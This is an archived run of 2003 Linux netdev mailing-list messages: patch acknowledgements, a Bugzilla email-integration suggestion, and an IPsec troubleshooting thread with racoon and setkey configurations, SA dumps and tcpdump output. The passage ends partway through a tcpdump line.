(IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id VAA31723; Sat, 19 Jul 2003 21:47:13 -0700 Date: Sat, 19 Jul 2003 21:47:12 -0700 From: "David S. Miller" To: Stephen Hemminger Cc: eis@baty.hanse.de, netdev@oss.sgi.com Subject: Re: [PATCH] Allow lapb to be unloaded. Message-Id: <20030719214712.3a0c9b0a.davem@redhat.com> In-Reply-To: <20030718150101.0558d04e.shemminger@osdl.org> References: <20030718133211.1c7ed08d.shemminger@osdl.org> <20030718150101.0558d04e.shemminger@osdl.org> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4184 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Fri, 18 Jul 2003 15:01:01 -0700 Stephen Hemminger wrote: > Without an exit routine lapb can't be unloaded. Applied, thanks. From davem@redhat.com Sat Jul 19 21:58:51 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 19 Jul 2003 21:58:54 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6K4wpFl017805 for ; Sat, 19 Jul 2003 21:58:51 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id VAA31739; Sat, 19 Jul 2003 21:48:44 -0700 Date: Sat, 19 Jul 2003 21:48:43 -0700 From: "David S. Miller" To: Stephen Hemminger Cc: ncorbic@sangoma.com, netdev@oss.sgi.com Subject: Re: [PATCH] Eliminate MOD_ from wanrouter Message-Id: <20030719214843.0dbf5f3c.davem@redhat.com> In-Reply-To: <20030718133512.434b1e70.shemminger@osdl.org> References: <20030718133512.434b1e70.shemminger@osdl.org> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4185 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Fri, 18 Jul 2003 13:35:12 -0700 Stephen Hemminger wrote: > Wan router register/unregister doesn't need MOD_INC/MOD_DEC because it > can't be unloaded as long as it's symbols are in use by the calling module. Applied, thanks. From jmorris@intercode.com.au Sat Jul 19 22:58:39 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 19 Jul 2003 22:58:46 -0700 (PDT) Received: from blackbird.intercode.com.au (IDENT:sJBNgwjiY7rTz2hT3yM7ngZjZI5hzeVT@blackbird.intercode.com.au [203.32.101.10]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6K5waFl021050 for ; Sat, 19 Jul 2003 22:58:38 -0700 Received: from excalibur.intercode.com.au (excalibur.intercode.com.au [203.32.101.12]) by blackbird.intercode.com.au (8.11.6p2/8.9.3) with ESMTP id h6K5wDr11855; Sun, 20 Jul 2003 15:58:14 +1000 Date: Sun, 20 Jul 2003 15:58:13 +1000 (EST) From: James Morris To: Sean Neakums cc: netdev@oss.sgi.com, Subject: Re: [2.6.0-test1-mm1] TCP connections over ipsec hang after a few seconds In-Reply-To: <6uk7aeab33.fsf@zork.zork.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4186 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jmorris@intercode.com.au Precedence: bulk X-list: netdev On Sat, 19 Jul 2003, Sean Neakums wrote: > twenty. The problem seems unrelated to the amount of data > transferred; I've tried both bulk rsync transfers and ssh sessions. > I've also tested the same boxes over 100baseT; still happens. It sounds a bit like a pmtu problem related to the wireless bridge, but that would be dependent on amount of data transferred and should not happen on 100baseT. Transport mode (just blowfish encryption) looks to be working ok for me, I'm able to ftp uncompressed kernel tarballs between two boxes over gigabit ethernet with no apparent problems. - James -- James Morris From cedric.gavage@unixtech.be Sun Jul 20 01:45:38 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 20 Jul 2003 01:45:47 -0700 (PDT) Received: from virtual.paginaweb.be (virtual.paginaweb.be [212.3.242.133]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6K8jaFl029633 for ; Sun, 20 Jul 2003 01:45:37 -0700 Received: from unixtech.be (193.170-136-217.adsl.skynet.be [217.136.170.193]) (authenticated bits=0) by virtual.paginaweb.be (8.12.9/8.12.9/UnixTech - Niddle v2.5 - abuse@unixtech.be) with ESMTP id h6K8jSPu024884; Sun, 20 Jul 2003 10:45:28 +0200 Message-ID: <3F1A566C.8070900@unixtech.be> Date: Sun, 20 Jul 2003 10:44:28 +0200 From: Cedric Gavage User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030714 Debian/1.3.1-3 StumbleUpon/1.73 X-Accept-Language: en MIME-Version: 1.0 To: "David S. Miller" CC: Alan Cox , netdev@oss.sgi.com Subject: Re: [Fwd: kernel 2.4.21] References: <1058634345.22000.2.camel@dhcp22.swansea.linux.org.uk> <20030719191723.0821227f.davem@redhat.com> In-Reply-To: <20030719191723.0821227f.davem@redhat.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 4187 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: cedric.gavage@unixtech.be Precedence: bulk X-list: netdev David S. Miller wrote: > On 19 Jul 2003 18:05:45 +0100 > Alan Cox wrote: > > >>>Jul 17 06:31:00 fazer kernel: KERNEL: assertion (newsk->state != >>>TCP_SYN_RECV) failed at tcp.c(2229) > > > This one was fixed in 2.4.21 > Thanks for the information... I'll upgrade and test again... -- Cedric Gavage http://unixtech.be - http://gavage.com - OpenPGP: 0xED325C64 From sneakums@zork.net Sun Jul 20 05:29:32 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 20 Jul 2003 05:29:42 -0700 (PDT) Received: from zork.zork.net (mail@zork.zork.net [64.81.246.102]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6KCTWFl016674 for ; Sun, 20 Jul 2003 05:29:32 -0700 Received: from sneakums by zork.zork.net with local (Exim 3.35 #1 (Debian)) id 19eDJd-0003V1-00; Sun, 20 Jul 2003 05:29:25 -0700 To: James Morris Cc: netdev@oss.sgi.com, Subject: Re: [2.6.0-test1-mm1] TCP connections over ipsec hang after a few seconds References: From: Sean Neakums Mail-Followup-To: James Morris , netdev@oss.sgi.com, In-Reply-To: (James Morris's message of "Sun, 20 Jul 2003 15:58:13 +1000 (EST)") Date: Sun, 20 Jul 2003 13:29:24 +0100 Message-ID: <6u8yqt8jq3.fsf@zork.zork.net> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-archive-position: 4188 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: sneakums@zork.net Precedence: bulk X-list: netdev James Morris writes: > On Sat, 19 Jul 2003, Sean Neakums wrote: > >> twenty. The problem seems unrelated to the amount of data >> transferred; I've tried both bulk rsync transfers and ssh sessions. >> I've also tested the same boxes over 100baseT; still happens. > > It sounds a bit like a pmtu problem related to the wireless bridge, but > that would be dependent on amount of data transferred and should not > happen on 100baseT. I am seeing a lot of "pmtu discvovery on SA AH/03537192/c0a80003" type messages (I forgot to check for them when on 100baseT; will recheck that). Are these indicative of such a problem? I seem to recall that reducing the max MTU is not as straightforward as just adjusting the interfaces' mtu setting. What should I do to eliminate pmtu as the source of the problem? > Transport mode (just blowfish encryption) looks to be working ok for me, > I'm able to ftp uncompressed kernel tarballs between two boxes over > gigabit ethernet with no apparent problems. I had been using 3des with AH; just retried with blowfish 448 and no AH with much the same result. From jmorris@intercode.com.au Sun Jul 20 08:21:36 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 20 Jul 2003 08:21:46 -0700 (PDT) Received: from blackbird.intercode.com.au (IDENT:8RmbbmJKfK3ai/r7MYhGLCWvjA/C2Vdw@blackbird.intercode.com.au [203.32.101.10]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6KFLXFl024869 for ; Sun, 20 Jul 2003 08:21:35 -0700 Received: from excalibur.intercode.com.au (excalibur.intercode.com.au [203.32.101.12]) by blackbird.intercode.com.au (8.11.6p2/8.9.3) with ESMTP id h6KFLOr13471; Mon, 21 Jul 2003 01:21:25 +1000 Date: Mon, 21 Jul 2003 01:21:24 +1000 (EST) From: James Morris To: Sean Neakums cc: netdev@oss.sgi.com, Subject: Re: [2.6.0-test1-mm1] TCP connections over ipsec hang after a few seconds In-Reply-To: <6u8yqt8jq3.fsf@zork.zork.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4189 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jmorris@intercode.com.au Precedence: bulk X-list: netdev On Sun, 20 Jul 2003, Sean Neakums wrote: > I am seeing a lot of "pmtu discvovery on SA AH/03537192/c0a80003" type > messages (I forgot to check for them when on 100baseT; will recheck > that). Are these indicative of such a problem? Yes. With the 100baseT configuration, are the systems on the same segment? It might help to provide tcpdumps from each end, ifconfig output for each interface and setkey configuration (without the wlan bridging). - James -- James Morris From pasky@machine.sinus.cz Sun Jul 20 09:46:16 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 20 Jul 2003 09:46:31 -0700 (PDT) Received: from machine.sinus.cz (pasky.ji.cz [213.226.226.138]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6KGkEFl029041 for ; Sun, 20 Jul 2003 09:46:15 -0700 Received: (qmail 8974 invoked by uid 2001); 20 Jul 2003 16:46:09 -0000 Date: Sun, 20 Jul 2003 18:46:09 +0200 From: Petr Baudis To: "Martin J. Bligh" Cc: "David S. Miller" , alan@lxorguk.ukuu.org.uk, greearb@candelatech.com, linux-kernel@vger.kernel.org, linux-net@vger.kernel.org, netdev@oss.sgi.com Subject: Re: Re: networking bugs and bugme.osdl.org Message-ID: <20030720164609.GH12132@pasky.ji.cz> Mail-Followup-To: "Martin J. Bligh" , "David S. Miller" , alan@lxorguk.ukuu.org.uk, greearb@candelatech.com, linux-kernel@vger.kernel.org, linux-net@vger.kernel.org, netdev@oss.sgi.com References: <20030629.151302.28804993.davem@redhat.com> <17280000.1056940541@[10.10.2.4]> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <17280000.1056940541@[10.10.2.4]> User-Agent: Mutt/1.4i X-message-flag: Outlook : A program to spread viri, but it can do mail too. X-archive-position: 4190 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: pasky@ucw.cz Precedence: bulk X-list: netdev Dear diary, on Mon, Jun 30, 2003 at 04:35:44AM CEST, I got a letter, where "Martin J. Bligh" told me, that... > --"David S. Miller" wrote (on Sunday, June 29, 2003 15:13:02 -0700): ..snip.. > > The greatest tools in the world aren't useful if people don't want > > to use them. > > > > Nobody wants to use tools unless it melds easily into their existing > > daily routine. This means it must be email based and it must somehow > > work via the existing mailing lists. It sounds a lot like what I'm > > advocating except that there's some robot monitoring the list > > postings. > > Agreed, the interface could be better - we're working on it. It won't > be totally change free, but it could be better integrated. Feedback is > very useful, though it helps a lot of you can pinpoint what's the > underlying issue rather than "this is crap". Better email integration > is top of the list, starting with sending stuff out to multiple people > when filed, not a single bottleneck point. Actually, it's not difficult to make Bugzilla to do things like sending out ALL bugs updates emails to certain email adress(es), on a global basis or per-module. Also, it is relatively easy to make Bugzilla _accept_ bugs updates through email, from additional comments (+ attachments) to status/priority/target/... changes. It works quite nicely for us (ELinks) and it took just few hours to set up properly (we had to touch the BZ sources, but just a little, the rest are external support scripts). What is missing is some email interface for querying the database (shouldn't be difficult to do, though), but if you just want to file/update bugs, all you need is to: * have the new bugs posted on the mailing list * keep bugzilla in the cc list through the whole thread, as long as it's relevant at least ;-) * don't remove [Bug 12345] from the subject If Martin would like some know-how about how to set things up, I could share what we've done with him. Kind regards, -- Petr "Pasky" Baudis . Perfection is reached, not when there is no longer anything to add, but when there is no longer anything to take away. -- Antoine de Saint-Exupery . Stuff: http://pasky.ji.cz/ From sneakums@zork.net Sun Jul 20 12:23:30 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 20 Jul 2003 12:23:51 -0700 (PDT) Received: from zork.zork.net (mail@zork.zork.net [64.81.246.102]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6KJNRFl004973 for ; Sun, 20 Jul 2003 12:23:28 -0700 Received: from sneakums by zork.zork.net with local (Exim 3.35 #1 (Debian)) id 19eJm9-0003Sl-00; Sun, 20 Jul 2003 12:23:17 -0700 To: James Morris Cc: netdev@oss.sgi.com, Subject: Re: [2.6.0-test1-mm1] TCP connections over ipsec hang after a few seconds References: From: Sean Neakums Mail-Followup-To: James Morris , netdev@oss.sgi.com, Date: Sun, 20 Jul 2003 20:23:16 +0100 In-Reply-To: (James Morris's message of "Mon, 21 Jul 2003 01:21:24 +1000 (EST)") Message-ID: <6uwued6lzv.fsf@zork.zork.net> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-archive-position: 4191 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: sneakums@zork.net Precedence: bulk X-list: netdev James Morris writes: > On Sun, 20 Jul 2003, Sean Neakums wrote: > >> I am seeing a lot of "pmtu discvovery on SA AH/03537192/c0a80003" type >> messages (I forgot to check for them when on 100baseT; will recheck >> that). Are these indicative of such a problem? > > Yes. I still get these messages running over 100baseT. > With the 100baseT configuration, are the systems on the same segment? I'm connecting the two machines with a crossed-over cable. > It might help to provide tcpdumps from each end, ifconfig output for each > interface and setkey configuration (without the wlan bridging). Below is the config info. I'm running racoon. I ended up with about forty megabytes of tcpdump output on each side of the link before the hang occurred. I've appended below the last 150 lines of each dump. Four separate TCP connections were involved in all, for a total of about 400MiB of data transferred. --- First machine eth0 Link encap:Ethernet HWaddr xx:xx:xx:xx:xx:xx inet addr:192.168.0.1 Bcast:192.168.0.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:113024 errors:0 dropped:0 overruns:0 frame:0 TX packets:361585 errors:0 dropped:0 overruns:0 carrier:0 collisions:97 txqueuelen:100 RX bytes:8468832 (8.0 MiB) TX bytes:531820915 (507.1 MiB) Interrupt:10 Base address:0xc400 Memory:dfffe000-dfffe038 --- #!/usr/sbin/setkey -f flush; spdflush; spdadd 192.168.0.1 192.168.0.3 any -P out ipsec esp/transport//require; spdadd 192.168.0.3 192.168.0.1 any -P in ipsec esp/transport//require; --- # $KAME: racoon.conf.in,v 1.18 2001/08/16 06:33:40 itojun Exp $ # "path" must be placed before it should be used. # You can overwrite which you defined, but it should not use due to confusing. path include "/etc/racoon" ; #include "remote.conf" ; # search this file for pre_shared_key with various ID key. path pre_shared_key "/etc/racoon/psk.txt" ; # racoon will look for certificate file in the directory, # if the certificate/certificate request payload is received. path certificate "/etc/cert" ; # "log" specifies logging level. It is followed by either "notify", "debug" # or "debug2". #log debug; # "padding" defines some parameter of padding. You should not touch these. padding { maximum_length 20; # maximum padding length. randomize off; # enable randomize length. strict_check off; # enable strict check. exclusive_tail off; # extract last one octet. } # if no listen directive is specified, racoon will listen to all # available interface addresses. listen { #isakmp ::1 [7000]; #isakmp 202.249.11.124 [500]; #admin [7002]; # administrative's port by kmpstat. #strict_address; # required all addresses must be bound. } # Specification of default various timer. timer { # These value can be changed per remote node. counter 5; # maximum trying count to send. interval 20 sec; # maximum interval to resend. persend 1; # the number of packets per a send. # timer for waiting to complete each phase. phase1 30 sec; phase2 15 sec; } remote anonymous { exchange_mode aggressive,main; doi ipsec_doi; situation identity_only; my_identifier address; lifetime time 2 min; # sec,min,hour initial_contact on; proposal_check obey; # obey, strict or claim proposal { encryption_algorithm blowfish 448; hash_algorithm sha1; authentication_method pre_shared_key ; dh_group 2 ; } } sainfo anonymous { pfs_group 1; lifetime time 2 min; encryption_algorithm blowfish 448; authentication_algorithm hmac_sha1; compression_algorithm deflate; } remote 192.168.0.3 { exchange_mode aggressive, main; my_identifier asn1dn; peers_identifier asn1dn; certificate_type x509 "tower.public" "tower.private"; peers_certfile "craptop.public"; proposal { encryption_algorithm blowfish 448; hash_algorithm sha1; authentication_method rsasig; dh_group 2; } } --- 192.168.0.3 192.168.0.1 esp mode=transport spi=186578041(0x0b1ef479) reqid=0(0x00000000) E: blowfish-cbc 6047c0a9 b1244f40 37937606 2246d408 f3de362c 31f21b89 4cab6800 abde86ff b002ae5a 08681d2a d55c99fa ad2a626d d1f3a064 15f898d1 A: hmac-sha1 a27c176b 40e0f619 c3a16111 72742867 acfc9b89 seq=0x00000000 replay=4 flags=0x00000000 state=mature created: Jul 20 20:05:25 2003 current: Jul 20 20:06:58 2003 diff: 93(s) hard: 120(s) soft: 96(s) last: hard: 0(s) soft: 0(s) current: 0(bytes) hard: 0(bytes) soft: 0(bytes) allocated: 0 hard: 0 soft: 0 sadb_seq=1 pid=2052 refcnt=0 192.168.0.1 192.168.0.3 esp mode=transport spi=55613933(0x035099ed) reqid=0(0x00000000) E: blowfish-cbc d4ae888d 41f40471 9d51d800 bb52e89d a29e48ef 1f7e826f f16ac829 06e3fb74 e8731ee8 579b4f04 01e7e8a6 8f4d5ff0 cb57b801 e6cf4036 A: hmac-sha1 ca60673d bdab7f98 9b258c9e 6a6e6da3 8ff07b20 seq=0x00000000 replay=4 flags=0x00000000 state=mature created: Jul 20 20:05:25 2003 current: Jul 20 20:06:58 2003 diff: 93(s) hard: 120(s) soft: 96(s) last: Jul 20 20:05:48 2003 hard: 0(s) soft: 0(s) current: 3008(bytes) hard: 0(bytes) soft: 0(bytes) allocated: 2 hard: 0 soft: 0 sadb_seq=0 pid=2052 refcnt=0 --- Second machine eth0 Link encap:Ethernet HWaddr xx:xx:xx:xx:xx:xx inet addr:192.168.0.3 Bcast:192.168.0.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:313871 errors:0 dropped:0 overruns:0 frame:0 TX packets:83692 errors:0 dropped:0 overruns:0 carrier:1 collisions:0 txqueuelen:100 RX bytes:471974158 (450.1 MiB) TX bytes:7202706 (6.8 MiB) Interrupt:11 Base address:0xec80 --- #!/usr/sbin/setkey -f flush; spdflush; spdadd 192.168.0.3 192.168.0.1 any -P out ipsec esp/transport//require; spdadd 192.168.0.1 192.168.0.3 any -P in ipsec esp/transport//require; --- # $KAME: racoon.conf.in,v 1.18 2001/08/16 06:33:40 itojun Exp $ # "path" must be placed before it should be used. # You can overwrite which you defined, but it should not use due to confusing. path include "/etc/racoon" ; #include "remote.conf" ; # search this file for pre_shared_key with various ID key. path pre_shared_key "/etc/racoon/psk.txt" ; # racoon will look for certificate file in the directory, # if the certificate/certificate request payload is received. path certificate "/etc/cert" ; # "log" specifies logging level. It is followed by either "notify", "debug" # or "debug2". #log debug; # "padding" defines some parameter of padding. You should not touch these. padding { maximum_length 20; # maximum padding length. randomize off; # enable randomize length. strict_check off; # enable strict check. exclusive_tail off; # extract last one octet. } # if no listen directive is specified, racoon will listen to all # available interface addresses. listen { #isakmp ::1 [7000]; #isakmp 202.249.11.124 [500]; #admin [7002]; # administrative's port by kmpstat. #strict_address; # required all addresses must be bound. } # Specification of default various timer. timer { # These value can be changed per remote node. counter 5; # maximum trying count to send. interval 20 sec; # maximum interval to resend. persend 1; # the number of packets per a send. # timer for waiting to complete each phase. phase1 30 sec; phase2 15 sec; } remote anonymous { exchange_mode aggressive,main; doi ipsec_doi; situation identity_only; my_identifier address; lifetime time 2 min; # sec,min,hour initial_contact on; proposal_check obey; # obey, strict or claim proposal { encryption_algorithm blowfish 448; hash_algorithm sha1; authentication_method pre_shared_key ; dh_group 2 ; } } sainfo anonymous { pfs_group 1; lifetime time 2 min; encryption_algorithm blowfish 448; authentication_algorithm hmac_sha1; compression_algorithm deflate; } remote 192.168.0.1 { exchange_mode aggressive, main; my_identifier asn1dn; peers_identifier asn1dn; certificate_type x509 "craptop.public" "craptop.private"; peers_certfile "tower.public"; proposal { encryption_algorithm blowfish 448; hash_algorithm sha1; authentication_method rsasig; dh_group 2; } } --- 192.168.0.3 192.168.0.1 esp mode=transport spi=186578041(0x0b1ef479) reqid=0(0x00000000) E: blowfish-cbc 6047c0a9 b1244f40 37937606 2246d408 f3de362c 31f21b89 4cab6800 abde86ff b002ae5a 08681d2a d55c99fa ad2a626d d1f3a064 15f898d1 A: hmac-sha1 a27c176b 40e0f619 c3a16111 72742867 acfc9b89 seq=0x00000000 replay=4 flags=0x00000000 state=mature created: Jul 20 19:56:39 2003 current: Jul 20 19:57:55 2003 diff: 76(s) hard: 120(s) soft: 96(s) last: hard: 0(s) soft: 0(s) current: 0(bytes) hard: 0(bytes) soft: 0(bytes) allocated: 0 hard: 0 soft: 0 sadb_seq=1 pid=15668 refcnt=0 192.168.0.1 192.168.0.3 esp mode=transport spi=55613933(0x035099ed) reqid=0(0x00000000) E: blowfish-cbc d4ae888d 41f40471 9d51d800 bb52e89d a29e48ef 1f7e826f f16ac829 06e3fb74 e8731ee8 579b4f04 01e7e8a6 8f4d5ff0 cb57b801 e6cf4036 A: hmac-sha1 ca60673d bdab7f98 9b258c9e 6a6e6da3 8ff07b20 seq=0x00000000 replay=4 flags=0x00000000 state=mature created: Jul 20 19:56:39 2003 current: Jul 20 19:57:55 2003 diff: 76(s) hard: 120(s) soft: 96(s) last: hard: 0(s) soft: 0(s) current: 0(bytes) hard: 0(bytes) soft: 0(bytes) allocated: 0 hard: 0 soft: 0 sadb_seq=0 pid=15668 refcnt=0 --- last 150 lines of tcpdump on 192.168.0.1 20:04:11.901017 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x11315) (DF) (ttl 64, id 34196, len 72) 20:04:11.901132 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x11316) (DF) (ttl 64, id 34197, len 72) 20:04:11.901201 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa18) (DF) (ttl 64, id 5447, len 1496) 20:04:11.901381 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa19) (DF) (ttl 64, id 5448, len 1496) 20:04:11.901534 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa1a) (DF) (ttl 64, id 5449, len 1496) 20:04:11.901684 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa1b) (DF) (ttl 64, id 5450, len 1496) 20:04:11.901257 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x11317) (DF) (ttl 64, id 34198, len 72) 20:04:11.901863 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa1c) (DF) (ttl 64, id 5451, len 1496) 20:04:11.902013 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa1d) (DF) (ttl 64, id 5452, len 1496) 20:04:11.902162 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa1e) (DF) (ttl 64, id 5453, len 1496) 20:04:11.902312 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa1f) (DF) (ttl 64, id 5454, len 1496) 20:04:11.903145 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x11318) (DF) (ttl 64, id 34199, len 72) 20:04:11.903327 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa20) (DF) (ttl 64, id 5455, len 1496) 20:04:11.903382 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x11319) (DF) (ttl 64, id 34200, len 72) 20:04:11.903476 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa21) (DF) (ttl 64, id 5456, len 1496) 20:04:11.903641 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa22) (DF) (ttl 64, id 5457, len 1496) 20:04:11.903790 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa23) (DF) (ttl 64, id 5458, len 1496) 20:04:11.903940 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa24) (DF) (ttl 64, id 5459, len 1496) 20:04:11.904089 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa25) (DF) (ttl 64, id 5460, len 1496) 20:04:11.904237 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa26) (DF) (ttl 64, id 5461, len 1496) 20:04:11.904385 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa27) (DF) (ttl 64, id 5462, len 1496) 20:04:11.904567 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa28) (DF) (ttl 64, id 5463, len 1496) 20:04:11.905495 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x1131a) (DF) (ttl 64, id 34201, len 72) 20:04:11.905680 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa29) (DF) (ttl 64, id 5464, len 1496) 20:04:11.905749 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x1131b) (DF) (ttl 64, id 34202, len 72) 20:04:11.905835 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa2a) (DF) (ttl 64, id 5465, len 1496) 20:04:11.905990 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa2b) (DF) (ttl 64, id 5466, len 1496) 20:04:11.906130 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa2c) (DF) (ttl 64, id 5467, len 1496) 20:04:11.906269 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa2d) (DF) (ttl 64, id 5468, len 1496) 20:04:11.906408 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa2e) (DF) (ttl 64, id 5469, len 1496) 20:04:11.907958 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x1131c) (DF) (ttl 64, id 34203, len 72) 20:04:11.908072 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x1131d) (DF) (ttl 64, id 34204, len 72) 20:04:11.908212 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa2f) (DF) (ttl 64, id 5470, len 1496) 20:04:11.908198 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x1131e) (DF) (ttl 64, id 34205, len 72) 20:04:11.908392 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa30) (DF) (ttl 64, id 5471, len 1496) 20:04:11.908547 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa31) (DF) (ttl 64, id 5472, len 1496) 20:04:11.908690 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa32) (DF) (ttl 64, id 5473, len 1496) 20:04:11.908863 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa33) (DF) (ttl 64, id 5474, len 1496) 20:04:11.909028 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa34) (DF) (ttl 64, id 5475, len 1496) 20:04:11.909180 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa35) (DF) (ttl 64, id 5476, len 1496) 20:04:11.909332 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa36) (DF) (ttl 64, id 5477, len 1496) 20:04:11.908353 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x1131f) (DF) (ttl 64, id 34206, len 72) 20:04:11.909543 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa37) (DF) (ttl 64, id 5478, len 1496) 20:04:11.909691 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa38) (DF) (ttl 64, id 5479, len 1496) 20:04:11.909841 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa39) (DF) (ttl 64, id 5480, len 1496) 20:04:11.909992 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa3a) (DF) (ttl 64, id 5481, len 1496) 20:04:11.910141 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa3b) (DF) (ttl 64, id 5482, len 1496) 20:04:11.910294 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa3c) (DF) (ttl 64, id 5483, len 1496) 20:04:11.910442 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa3d) (DF) (ttl 64, id 5484, len 1496) 20:04:11.910592 